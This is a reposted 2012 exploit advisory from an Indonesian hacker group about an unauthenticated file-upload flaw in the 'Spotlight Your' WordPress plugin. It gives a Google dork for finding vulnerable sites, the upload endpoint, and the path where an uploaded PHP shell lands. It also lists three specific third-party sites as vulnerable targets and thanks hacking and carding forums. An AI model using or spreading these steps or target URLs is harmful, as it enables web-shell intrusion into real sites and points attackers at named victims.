___________.__ _________ _________ \__ ___/| |__ ____ \_ ___ \______ ______ _ ________ \_ ___ \______ ______ _ __ | | | | \_/ __ \ / \ \|_ __ \/ _ \ \/ \/ / ___/ / \ \|_ __ \/ __ \ \/ \/ / | | | Y \ ___/ \ \___| | \( <_> ) /\___ \ \ \___| | \| ___/\ / |____| |___| /\___ > \______ /__| \____/ \/\_//____ > \______ /__| \___ >\/\_/ \/ \/ \/ \/ \/ \/ INDO-PENDENT HACKER http://thecrowscrew.org ################################################################################################# Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability Google Dork: inurl:"/wp-content/plugins/spotlightyour/" Date: 18/11/2012 Locations: Banjarmasin, Indonesia Author: ovanIsmycode & walangkaji Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org Software Link: http://www.spotlightyour.com ################################################################################################# [+] POC Exp. Target : - http://domain.com/wp-content/plugins/spotlightyour/ Exploit : - /monetize/upload/index.php Shell Access : - http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php Ending : - Fraksi Bejoug a.k.a Kalam Saheru Saparatoss Blank Blank awkwkwkwk :v http://beautyexo.com/wp-content/plugins/spotlightyour/monetize/upload/ http://www.promogotion.com/wp-content/plugins/spotlightyour/monetize/upload/ http://shopping.businessminister.com/wp-content/plugins/spotlightyour/monetize/upload/ ################################################################################################# Spec!4L th4nk'5 to : MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7, penjamoen, -=[The Crows Crew]=-, Indonesian Hacker thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org ########################################[end]#################################################### # 1337day.com [2012-11-19]
Wordpress Plugins Spotlight Your Upload Vulnerability
Wordpress Plugins Spotlight Your Upload Vulnerability | Juno_okyo's Blog
Leader at J2TEAM. Website: https://j2team.dev/